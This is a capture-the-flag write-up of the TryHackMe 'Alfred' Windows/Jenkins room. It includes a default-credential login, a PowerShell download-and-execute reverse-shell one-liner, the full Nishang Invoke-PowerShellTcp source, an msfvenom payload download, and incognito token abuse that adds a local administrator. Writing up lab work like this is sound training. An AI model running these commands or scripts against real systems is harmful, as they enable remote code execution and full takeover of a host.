THM Alfred

Penetration Test
,

Alfred

Difficulty: Easy
Score: 3/10

Target

  1. 2 flags
  2. system priveledge

Process

Reconnaissance

We found 3 port is opened. They are 80, 3389, 8080.
The 8080 port

Username:Password → admin:admin (Easy guess it)
We found it can execute Windows command directly!

cmd -> Powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.61.17:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.61.17 -Port 4445

Delivery

Powershell_reverse_shell

function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.
The script is derived from Powerfun written by Ben Turner & Dave Hardy
.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.
.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444
Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(
        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,
        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,
        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )

    try
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }
        #Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()
            $client = $listener.AcceptTcpClient()
        }
        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}
        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)
        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                #Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target."
                Write-Error $_
            }
            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x
            #Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}

input command whoami /priv

PS C:\Program Files (x86)\Jenkins\workspace\project>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                  Description                               State
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled

SeDebugPrivileg

SeDebugPrivilege allows a process to inspect and adjust the memory of other processes, and has long been a security concern.** SeDebugPrivilege allows the token bearer to access any process or thread**, regardless of security descriptors.

SeImpersonatePrivilege

The “Impersonate a client after authentication” user right (SeImpersonatePrivilege) is a Windows 2000 security setting that was first introduced in Windows 2000 SP4. … The following components also have this user right: Services that are started by the Service Control Manager

SeCreateGlobalPrivilege

The “Create global objects” user right (SeCreateGlobalPrivilege) is a Windows 2000 security setting that was first introduced in Windows 2000 SP4. The user right is required for a user account to create global objects in a Terminal Services session.

Control and Command

Use nc listen the 4445 port.

nc -lnvp 4445

Use the powershell to download the binary file (Msfvenom → shell)

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

Use metasploit to listen on the port

Execute the shell

Start-Process "shell-name.exe"

Smb server transfer exe file

We will exploit SeImpersonatePrivilege and SeDebugPrivilege with the help of incognito https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip

Hacker:
python3 smbserver.py sharefolder .
Target:
copy \\10.11.14.106\smbfolder\incognito.exe   // It will download the exe file

Now with incognito we can just create a user and add it to local administrators group:

PS C:\windows\temp> ./incognito.exe add_user writeup I_hope_you_like_it
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user writeup to host 127.0.0.1
[+] Successfully added user
PS C:\windows\temp> ./incognito.exe add_localgroup_user Administrators writeup
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user writeup to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group

As port 3389 was open we can login through rdesktop:

rdesktop -g 90% -u writeup -p I_hope_you_like_it 10.10.151.159

Post

get the flag1 and flag2

Summary